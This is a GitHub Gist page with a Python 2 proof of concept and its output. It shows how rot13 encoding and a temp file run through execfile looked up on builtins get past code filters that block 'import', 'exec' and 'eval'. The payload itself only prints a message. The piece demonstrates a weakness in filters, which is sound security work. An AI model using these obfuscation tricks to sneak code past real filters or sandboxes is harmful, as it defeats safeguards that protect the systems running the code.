Last active
August 29, 2015 14:05
-
-
Save kbourgoin/8bb47358c98806f05548 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# First, lets make some (slightly) malicious code I want to run. | |
# The import proves we could delete the entire disk, but really we have | |
# access to the whole machine if we can import anything we want. | |
code = """import shutil | |
print "\tI could have just done bad things" | |
""" | |
# Obviously you're scanning for "import", so let's obfuscate a little bit. | |
# I use a rot13 cipher because it's easy, but any two-way cipher | |
# is sufficient to hide what we're really doing. | |
code = code.replace('\n', ';').encode('rot13') | |
# Now, all I need to do is submit this as my "job code" to be run | |
job_code = 'exec("""{}""".encode("rot13"))'.format(code) | |
print "I'm going to run some code, how bad could this be?" | |
print 'Running: "{}"'.format(job_code) | |
print 'Result:' | |
exec(job_code) | |
# You could be stripping exec and eval too, so let's see if we can get around that. | |
exec_str = 'execfile'.encode('rot13') | |
wrapper = """import tempfile | |
fun = tempfile.NamedTemporaryFile() | |
fun.write('{}'.encode('rot13')) | |
fun.flush() | |
print '\tI just wrote some code to {{}}'.format(fun.name) | |
fn = getattr(locals()['__builtins__'], '{}'.encode('rot13')) | |
fn(fun.name) | |
""".replace('\n', ';').format(code, exec_str) | |
print "This code doesn't eval or exec. Has to be good, right?" | |
print 'Running: "{}"'.format(wrapper) | |
print 'Result: ' | |
exec(wrapper) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I'm going to run some code, how bad could this be? | |
Running: "exec("""vzcbeg fuhgvy;cevag " V pbhyq unir whfg qbar onq guvatf";""".encode("rot13"))" | |
Result: | |
I could have just done bad things | |
This code doesn't eval or exec. Has to be good, right? | |
Running: "import tempfile;fun = tempfile.NamedTemporaryFile();fun.write('vzcbeg fuhgvy;cevag " V pbhyq unir whfg qbar onq guvatf";'.encode('rot13'));fun.flush();print ' I just wrote some code to {}'.format(fun.name);fn = getattr(locals()['__builtins__'], 'rkrpsvyr'.encode('rot13'));fn(fun.name);" | |
Result: | |
I just wrote some code to /tmp/tmpkCQChX | |
I could have just done bad things |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment